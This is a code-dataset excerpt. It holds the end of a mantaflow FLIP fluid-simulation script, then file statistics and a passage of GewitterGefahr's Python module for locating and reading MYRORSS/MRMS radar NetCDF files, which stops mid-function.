flags.initDomain(boundaryWidth=bWidth, phiWalls=phiObs )
fluidVel = 0
fluidSetVel = 0
phi.setConst(999.)
# standing dam
fluidbox1 = Box( parent=s, p0=gs*vec3(0,0,0), p1=gs*vec3(1.0,0.3,1))
phi.join( fluidbox1.computeLevelset() )
fluidbox2 = Box( parent=s, p0=gs*vec3(0.1,0,0), p1=gs*vec3(0.2,0.75,1))
phi.join( fluidbox2.computeLevelset() )
if 1:
sphere = Sphere( parent=s , center=gs*vec3(0.66,0.3,0.5), radius=res*0.2)
phiObs.join( sphere.computeLevelset() )
#obsbox = Box( parent=s, p0=gs*vec3(0.4,0.2,0), p1=gs*vec3(0.7,0.4,1))
#obsbox = Box( parent=s, p0=gs*vec3(0.3,0.2,0), p1=gs*vec3(0.7,0.6,1))
#phiObs.join( obsbox.computeLevelset() )
flags.updateFromLevelset(phi)
phi.subtract( phiObs );
sampleLevelsetWithParticles( phi=phi, flags=flags, parts=pp, discretization=2, randomness=0.05 )
if fluidVel!=0:
# set initial velocity
fluidVel.applyToGrid( grid=vel , value=fluidSetVel )
mapGridToPartsVec3(source=vel, parts=pp, target=pVel )
# also sets boundary flags for phiObs
updateFractions( flags=flags, phiObs=phiObs, fractions=fractions, boundaryWidth=bWidth )
setObstacleFlags(flags=flags, phiObs=phiObs, fractions=fractions)
lastFrame = -1
if 1 and (GUI):
gui = Gui()
gui.show()
#gui.pause()
# save a reference to any grid, to automatically determine the grid size
if saveParts:
pressure.save( 'ref_flipParts_0000.uni' );
#main loop
while s.frame < frames:
maxVel = vel.getMax()
s.adaptTimestep( maxVel )
mantaMsg('\nFrame %i, time-step size %f' % (s.frame, s.timestep))
# FLIP
pp.advectInGrid(flags=flags, vel=vel, integrationMode=IntRK4, deleteInObstacle=False, stopInObstacle=False )
pushOutofObs( parts=pp, flags=flags, phiObs=phiObs )
advectSemiLagrange(flags=flags, vel=vel, grid=phi, order=1) # first order is usually enough
advectSemiLagrange(flags=flags, vel=vel, grid=vel, order=2)
# create level set of particles
gridParticleIndex( parts=pp , flags=flags, indexSys=pindex, index=gpi )
unionParticleLevelset( pp, pindex, flags, gpi, phiParts )
# combine level set of particles with grid level set
phi.addConst(1.); # shrink slightly
phi.join( phiParts );
extrapolateLsSimple(phi=phi, distance=narrowBand+2, inside=True )
extrapolateLsSimple(phi=phi, distance=3 )
phi.setBoundNeumann(0) # make sure no particles are placed at outer boundary, warning - larger values can delete thin sheets at outer walls...
flags.updateFromLevelset(phi)
# combine particles velocities with advected grid velocities
mapPartsToMAC(vel=velParts, flags=flags, velOld=velOld, parts=pp, partVel=pVel, weight=tmpVec3)
extrapolateMACFromWeight( vel=velParts , distance=2, weight=tmpVec3 )
combineGridVel(vel=velParts, weight=tmpVec3 , combineVel=vel, phi=phi, narrowBand=(narrowBand-1), thresh=0)
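# Narrow-band FLIP: particle velocities are used only within ~narrowBand
# cells of the surface; deeper inside the liquid the advected grid
# velocities from the step above are kept.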
velOld.copyFrom(vel)
# forces & pressure solve
addGravity(flags=flags, vel=vel, gravity=(0,-0.001,0))
extrapolateMACSimple( flags=flags, vel=vel , distance=2, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
solvePressure(flags=flags, vel=vel, pressure=pressure, phi=phi, fractions=fractions )
extrapolateMACSimple( flags=flags, vel=vel , distance=4, intoObs=True )
setWallBcs(flags=flags, vel=vel, fractions=fractions, phiObs=phiObs)
if (dim==3):
# mis-use phiParts as temp grid to close the mesh
phiParts.copyFrom(phi)
phiParts.setBound(0.5,0)
phiParts.createMesh(mesh)
# set source grids for resampling, used in adjustNumber!
pVel.setSource( vel, isMAC=True )
adjustNumber( parts=pp, vel=vel, flags=flags, minParticles=1*minParticles, maxParticles=2*minParticles, phi=phi, exclude=phiObs, narrowBand=narrowBand )
flipVelocityUpdate(vel=vel, velOld=velOld, flags=flags, parts=pp, partVel=pVel, flipRatio=0.97 )
s.step()
if (lastFrame!=s.frame):
# generate data for flip03_gen.py surface generation scene
if saveParts:
pp.save( 'flipParts_%04d.uni' % s.frame );
if 0 and (GUI):
gui.screenshot( 'flip06_%04d.png' % s.frame );
#s.printMemInfo()
lastFrame = s.frame;
| 32.99375
| 154
| 0.722675
| 746
| 5,279
| 5.107239
| 0.345845
| 0.044619
| 0.030709
| 0.037795
| 0.135171
| 0.129659
| 0.065617
| 0.055643
| 0.04252
| 0.035171
| 0
| 0.03337
| 0.148513
| 5,279
| 159
| 155
| 33.201258
| 0.814238
| 0.227505
| 0
| 0.061856
| 0
| 0
| 0.021777
| 0.005444
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010309
| 0
| 0.010309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee646ecd75eb338880899b14fe5eafbb53b55cd1
| 38,214
|
py
|
Python
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
dopplerchase/GewitterGefahr
|
4415b08dd64f37eba5b1b9e8cc5aa9af24f96593
|
[
"MIT"
] | 26
|
2018-10-04T01:07:35.000Z
|
2022-01-29T08:49:32.000Z
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
liuximarcus/GewitterGefahr
|
d819874d616f98a25187bfd3091073a2e6d5279e
|
[
"MIT"
] | 4
|
2017-12-25T02:01:08.000Z
|
2018-12-19T01:54:21.000Z
|
gewittergefahr/gg_io/myrorss_and_mrms_io.py
|
liuximarcus/GewitterGefahr
|
d819874d616f98a25187bfd3091073a2e6d5279e
|
[
"MIT"
] | 11
|
2017-12-10T23:05:29.000Z
|
2022-01-29T08:49:33.000Z
|
"""IO methods for radar data from MYRORSS or MRMS.
MYRORSS = Multi-year Reanalysis of Remotely Sensed Storms
MRMS = Multi-radar Multi-sensor
"""
import os
import glob
import warnings
import numpy
import pandas
from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'
TIME_FORMAT_SECONDS_REGEX = (
'[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')
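# TIME_FORMAT_SECONDS_REGEX matches one timestamp in TIME_FORMAT_SECONDS,
# e.g. '20100101-120734'; find_raw_files_one_spc_date substitutes it for the
# time string when globbing all files on one SPC date.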
MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3
SENTINEL_TOLERANCE = 10.
LATLNG_MULTIPLE_DEG = 1e-4
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180
ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'
AZIMUTHAL_SHEAR_FIELD_NAMES = [
radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
"""Generates glob pattern for pathless name of raw file.
This method rounds the time step to the nearest minute and allows the file
to be either zipped or unzipped.
The pattern generated by this method is meant for input to `glob.glob`.
This method is the "pattern" version of _get_pathless_raw_file_name.
:param unix_time_sec: Valid time.
:return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
"""
return '{0:s}*{1:s}*'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_MINUTES),
UNZIPPED_FILE_EXTENSION
)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
"""Generates pathless name for raw file.
:param unix_time_sec: Valid time.
:param zipped: Boolean flag. If True, will generate name for zipped file.
If False, will generate name for unzipped file.
:return: pathless_raw_file_name: Pathless name for raw file.
"""
if zipped:
return '{0:s}{1:s}{2:s}'.format(
time_conversion.unix_sec_to_string(
unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION,
ZIPPED_FILE_EXTENSION
)
return '{0:s}{1:s}'.format(
time_conversion.unix_sec_to_string(unix_time_sec, TIME_FORMAT_SECONDS),
UNZIPPED_FILE_EXTENSION
)
def _remove_sentinels_from_sparse_grid(
sparse_grid_table, field_name, sentinel_values):
"""Removes sentinel values from sparse grid.
:param sparse_grid_table: pandas DataFrame with columns produced by
`read_data_from_sparse_grid_file`.
:param field_name: Name of radar field in GewitterGefahr format.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: sparse_grid_table: Same as input, except that rows with a sentinel
value are removed.
"""
num_rows = len(sparse_grid_table.index)
sentinel_flags = numpy.full(num_rows, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
sparse_grid_table[field_name].values, this_sentinel_value,
atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
return sparse_grid_table.drop(
sparse_grid_table.index[sentinel_indices], axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
"""Removes sentinel values from full grid.
M = number of rows (unique grid-point latitudes)
N = number of columns (unique grid-point longitudes)
:param field_matrix: M-by-N numpy array with radar field.
:param sentinel_values: 1-D numpy array of sentinel values.
:return: field_matrix: Same as input, except that sentinel values are
replaced with NaN.
"""
num_grid_rows = field_matrix.shape[0]
num_grid_columns = field_matrix.shape[1]
num_grid_points = num_grid_rows * num_grid_columns
field_matrix = numpy.reshape(field_matrix, num_grid_points)
sentinel_flags = numpy.full(num_grid_points, False, dtype=bool)
for this_sentinel_value in sentinel_values:
these_sentinel_flags = numpy.isclose(
field_matrix, this_sentinel_value, atol=SENTINEL_TOLERANCE)
sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)
sentinel_indices = numpy.where(sentinel_flags)[0]
field_matrix[sentinel_indices] = numpy.nan
return numpy.reshape(field_matrix, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
"""Generates relative path for raw files.
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param height_m_asl: Radar height (metres above sea level).
:return: relative_directory_name: Relative path for raw files.
"""
if field_name == radar_utils.REFL_NAME:
radar_utils.check_heights(
data_source=data_source, heights_m_asl=numpy.array([height_m_asl]),
field_name=radar_utils.REFL_NAME)
else:
height_m_asl = radar_utils.get_valid_heights(
data_source=data_source, field_name=field_name)[0]
return '{0:s}/{1:05.2f}'.format(
radar_utils.field_name_new_to_orig(
field_name=field_name, data_source_name=data_source),
float(height_m_asl) * METRES_TO_KM
)
def find_raw_file(
unix_time_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, raise_error_if_missing=True):
"""Finds raw file.
File should contain one field at one time step (e.g., MESH at 123502 UTC,
reflectivity at 500 m above sea level and 123502 UTC).
:param unix_time_sec: Valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and file is missing,
this method will raise an error. If False and file is missing, will
return *expected* path to raw file.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if raise_error_if_missing = True and file is missing.
"""
# Error-checking.
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_string(top_directory_name)
error_checking.assert_is_boolean(raise_error_if_missing)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, height_m_asl=height_m_asl,
data_source=data_source)
directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name
)
pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
pathless_file_name = _get_pathless_raw_file_name(
unix_time_sec, zipped=False)
raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)
if raise_error_if_missing and not os.path.isfile(raw_file_name):
raise ValueError(
'Cannot find raw file. Expected at: "{0:s}"'.format(raw_file_name)
)
return raw_file_name
def raw_file_name_to_time(raw_file_name):
"""Parses time from file name.
:param raw_file_name: Path to raw file.
:return: unix_time_sec: Valid time.
"""
error_checking.assert_is_string(raw_file_name)
_, time_string = os.path.split(raw_file_name)
time_string = time_string.replace(ZIPPED_FILE_EXTENSION, '').replace(
UNZIPPED_FILE_EXTENSION, '')
return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
desired_time_unix_sec, spc_date_string, field_name, data_source,
top_directory_name, height_m_asl=None, max_time_offset_sec=None,
raise_error_if_missing=False):
"""Finds raw file at inexact time.
If you know the exact valid time, use `find_raw_file`.
:param desired_time_unix_sec: Desired valid time.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Field name in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param max_time_offset_sec: Maximum offset between actual and desired valid
time.
For example, if `desired_time_unix_sec` is 162933 UTC 5 Jan 2018 and
`max_time_offset_sec` = 60, this method will look for az-shear at valid
times from 162833...163033 UTC 5 Jan 2018.
If None, this defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC` for
azimuthal-shear fields and `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC` for
all other fields.
:param raise_error_if_missing: Boolean flag. If no file is found and
raise_error_if_missing = True, this method will error out. If no file
is found and raise_error_if_missing = False, will return None.
:return: raw_file_name: Path to raw file.
:raises: ValueError: if no file is found and raise_error_if_missing = True.
"""
# Error-checking.
error_checking.assert_is_integer(desired_time_unix_sec)
_ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
error_checking.assert_is_boolean(raise_error_if_missing)
radar_utils.check_field_name(field_name)
if max_time_offset_sec is None:
if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
else:
max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC
error_checking.assert_is_integer(max_time_offset_sec)
error_checking.assert_is_greater(max_time_offset_sec, 0)
first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec - max_time_offset_sec),
MINUTES_TO_SECONDS)))
last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
float(desired_time_unix_sec + max_time_offset_sec),
MINUTES_TO_SECONDS)))
allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
start_time_unix_sec=first_allowed_minute_unix_sec,
end_time_unix_sec=last_allowed_minute_unix_sec,
time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)
relative_directory_name = get_relative_dir_for_raw_files(
field_name=field_name, data_source=data_source,
height_m_asl=height_m_asl)
raw_file_names = []
for this_time_unix_sec in allowed_minutes_unix_sec:
this_pathless_file_pattern = _get_pathless_raw_file_pattern(
this_time_unix_sec)
this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
top_directory_name, spc_date_string[:4], spc_date_string,
relative_directory_name, this_pathless_file_pattern
)
raw_file_names += glob.glob(this_file_pattern)
file_times_unix_sec = []
for this_raw_file_name in raw_file_names:
file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))
if len(file_times_unix_sec):
file_times_unix_sec = numpy.array(file_times_unix_sec)
time_differences_sec = numpy.absolute(
file_times_unix_sec - desired_time_unix_sec)
nearest_index = numpy.argmin(time_differences_sec)
min_time_diff_sec = time_differences_sec[nearest_index]
else:
min_time_diff_sec = numpy.inf
if min_time_diff_sec > max_time_offset_sec:
if raise_error_if_missing:
desired_time_string = time_conversion.unix_sec_to_string(
desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
error_string = (
'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
).format(field_name, max_time_offset_sec, desired_time_string)
raise ValueError(error_string)
return None
return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
spc_date_string, field_name, data_source, top_directory_name,
height_m_asl=None, raise_error_if_missing=True):
"""Finds raw files for one field and one SPC date.
:param spc_date_string: SPC date (format "yyyymmdd").
:param field_name: Name of radar field in GewitterGefahr format.
:param data_source: Data source (string).
:param top_directory_name: Name of top-level directory with raw files.
:param height_m_asl: Radar height (metres above sea level).
:param raise_error_if_missing: Boolean flag. If True and no files are
found, will raise error.
:return: raw_file_names: 1-D list of paths to raw files.
:raises: ValueError: if raise_error_if_missing = True and no files are
found.
"""
error_checking.assert_is_boolean(raise_error_if_missing)
example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
spc_date_string)
example_file_name = find_raw_file(
unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
field_name=field_name, data_source=data_source,
top_directory_name=top_directory_name, height_m_asl=height_m_asl,
raise_error_if_missing=False)
example_directory_name, example_pathless_file_name = os.path.split(
example_file_name)
example_time_string = time_conversion.unix_sec_to_string(
example_time_unix_sec, TIME_FORMAT_SECONDS)
pathless_file_pattern = example_pathless_file_name.replace(
example_time_string, TIME_FORMAT_SECONDS_REGEX)
pathless_file_pattern = pathless_file_pattern.replace(
ZIPPED_FILE_EXTENSION, '*')
raw_file_pattern = '{0:s}/{1:s}'.format(
example_directory_name, pathless_file_pattern)
raw_file_names = glob.glob(raw_file_pattern)
if raise_error_if_missing and not raw_file_names:
error_string = (
'Could not find any files with the following pattern: {0:s}'
).format(raw_file_pattern)
raise ValueError(error_string)
return raw_file_names
def find_many_raw_files(
desired_times_unix_sec, spc_date_strings, data_source, field_names,
top_directory_name, reflectivity_heights_m_asl=None,
max_time_offset_for_az_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
max_time_offset_for_non_shear_sec=
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
"""Finds raw file for each field/height pair and time step.
N = number of input times
T = number of unique input times
F = number of field/height pairs
:param desired_times_unix_sec: length-N numpy array with desired valid
times.
:param spc_date_strings: length-N list of corresponding SPC dates (format
"yyyymmdd").
:param data_source: Data source ("myrorss" or "mrms").
:param field_names: 1-D list of field names.
:param top_directory_name: Name of top-level directory with radar data from
the given source.
:param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
sea level) for the field "reflectivity_dbz". If "reflectivity_dbz" is
not in `field_names`, leave this as None.
:param max_time_offset_for_az_shear_sec: Max time offset (between desired
and actual valid time) for azimuthal-shear fields.
:param max_time_offset_for_non_shear_sec: Max time offset (between desired
and actual valid time) for non-azimuthal-shear fields.
:return: file_dictionary: Dictionary with the following keys.
file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
raw files.
file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
valid times.
file_dictionary['spc_dates_at_unique_times_unix_sec']: length-T numpy array
of corresponding SPC dates (as Unix seconds).
file_dictionary['field_name_by_pair']: length-F list of field names.
file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
(metres above sea level).
"""
field_name_by_pair, height_by_pair_m_asl = (
myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
field_names=field_names, data_source=data_source,
refl_heights_m_asl=reflectivity_heights_m_asl)
)
num_fields = len(field_name_by_pair)
error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
error_checking.assert_is_numpy_array(
desired_times_unix_sec, num_dimensions=1)
num_times = len(desired_times_unix_sec)
error_checking.assert_is_string_list(spc_date_strings)
error_checking.assert_is_numpy_array(
numpy.array(spc_date_strings),
exact_dimensions=numpy.array([num_times]))
spc_dates_unix_sec = numpy.array(
[time_conversion.spc_date_string_to_unix_sec(s)
for s in spc_date_strings])
time_matrix = numpy.hstack((
numpy.reshape(desired_times_unix_sec, (num_times, 1)),
numpy.reshape(spc_dates_unix_sec, (num_times, 1))
))
unique_time_matrix = numpy.vstack(
{tuple(this_row) for this_row in time_matrix}
).astype(int)
unique_times_unix_sec = unique_time_matrix[:, 0]
spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]
sort_indices = numpy.argsort(unique_times_unix_sec)
unique_times_unix_sec = unique_times_unix_sec[sort_indices]
spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
sort_indices]
num_unique_times = len(unique_times_unix_sec)
radar_file_name_matrix = numpy.full(
(num_unique_times, num_fields), '', dtype=object)
for i in range(num_unique_times):
this_spc_date_string = time_conversion.time_to_spc_date_string(
spc_dates_at_unique_times_unix_sec[i])
for j in range(num_fields):
if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
this_max_time_offset_sec = max_time_offset_for_az_shear_sec
this_raise_error_flag = False
else:
this_max_time_offset_sec = max_time_offset_for_non_shear_sec
this_raise_error_flag = True
if this_max_time_offset_sec == 0:
radar_file_name_matrix[i, j] = find_raw_file(
unix_time_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
raise_error_if_missing=this_raise_error_flag)
else:
radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
desired_time_unix_sec=unique_times_unix_sec[i],
spc_date_string=this_spc_date_string,
field_name=field_name_by_pair[j], data_source=data_source,
top_directory_name=top_directory_name,
height_m_asl=height_by_pair_m_asl[j],
max_time_offset_sec=this_max_time_offset_sec,
raise_error_if_missing=this_raise_error_flag)
if radar_file_name_matrix[i, j] is None:
this_time_string = time_conversion.unix_sec_to_string(
unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)
warning_string = (
'Cannot find file for "{0:s}" at {1:d} metres ASL and '
'{2:s}.'
).format(
field_name_by_pair[j], int(height_by_pair_m_asl[j]),
this_time_string
)
warnings.warn(warning_string)
return {
RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
UNIQUE_TIMES_KEY: unique_times_unix_sec,
SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
}
def read_metadata_from_raw_file(
netcdf_file_name, data_source, raise_error_if_fails=True):
"""Reads metadata from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param data_source: Data source (string).
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: metadata_dict: Dictionary with the following keys.
metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of northwesternmost
grid point.
metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
northwesternmost grid point.
metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
adjacent grid points.
metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
grid points.
metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
latitudes).
metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
longitudes).
metadata_dict['height_m_asl']: Radar height (metres above sea level).
metadata_dict['unix_time_sec']: Valid time.
metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
metadata_dict['field_name_orig']: Name of radar field in original (either
MYRORSS or MRMS) format.
metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
"""
error_checking.assert_file_exists(netcdf_file_name)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))
metadata_dict = {
radar_utils.NW_GRID_POINT_LAT_COLUMN:
getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
radar_utils.NW_GRID_POINT_LNG_COLUMN:
lng_conversion.convert_lng_positive_in_west(
getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
allow_nan=False),
radar_utils.LAT_SPACING_COLUMN:
getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
radar_utils.LNG_SPACING_COLUMN:
getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
radar_utils.NUM_LAT_COLUMN:
netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
radar_utils.NUM_LNG_COLUMN:
netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
radar_utils.HEIGHT_COLUMN:
getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
radar_utils.UNIX_TIME_COLUMN:
getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
FIELD_NAME_COLUMN_ORIG: field_name_orig,
radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
}
latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]
# TODO(thunderhoser): The following "if" condition is a hack. The purpose
# is to change grid corners only for actual MYRORSS data, not GridRad data
# in MYRORSS format.
if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
rounder.floor_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
rounder.ceiling_to_nearest(
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
metadata_dict[radar_utils.LNG_SPACING_COLUMN]))
sentinel_values = []
for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
sentinel_values.append(getattr(netcdf_dataset, this_column))
metadata_dict.update({
radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
netcdf_dataset.close()
return metadata_dict
def read_data_from_sparse_grid_file(
netcdf_file_name, field_name_orig, data_source, sentinel_values,
raise_error_if_fails=True):
"""Reads sparse radar grid from raw (either MYRORSS or MRMS) file.
This file should contain one radar field at one height and valid time.
:param netcdf_file_name: Path to input file.
:param field_name_orig: Name of radar field in original (either MYRORSS or
MRMS) format.
:param data_source: Data source (string).
:param sentinel_values: 1-D numpy array of sentinel values.
:param raise_error_if_fails: Boolean flag. If True and file cannot be read,
this method will raise an error. If False and file cannot be read, will
return None.
:return: sparse_grid_table: pandas DataFrame with the following columns.
Each row corresponds to one grid point.
sparse_grid_table.grid_row: Row index.
sparse_grid_table.grid_column: Column index.
sparse_grid_table.<field_name>: Radar measurement (column name is produced
by radar_utils.field_name_orig_to_new).
sparse_grid_table.num_grid_cells: Number of consecutive grid points with the
same radar measurement. Counting is row-major (to the right along the
row, then down to the next column if necessary).
"""
error_checking.assert_file_exists(netcdf_file_name)
error_checking.assert_is_numpy_array_without_nan(sentinel_values)
error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)
netcdf_dataset = netcdf_io.open_netcdf(
netcdf_file_name, raise_error_if_fails)
if netcdf_dataset is None:
return None
field_name = radar_utils.field_name_orig_to_new(
field_name_orig=field_name_orig, data_source_name=data_source)
num_values = len(netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG])
if num_values == 0:
sparse_grid_dict = {
GRID_ROW_COLUMN: numpy.array([], dtype=int),
GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
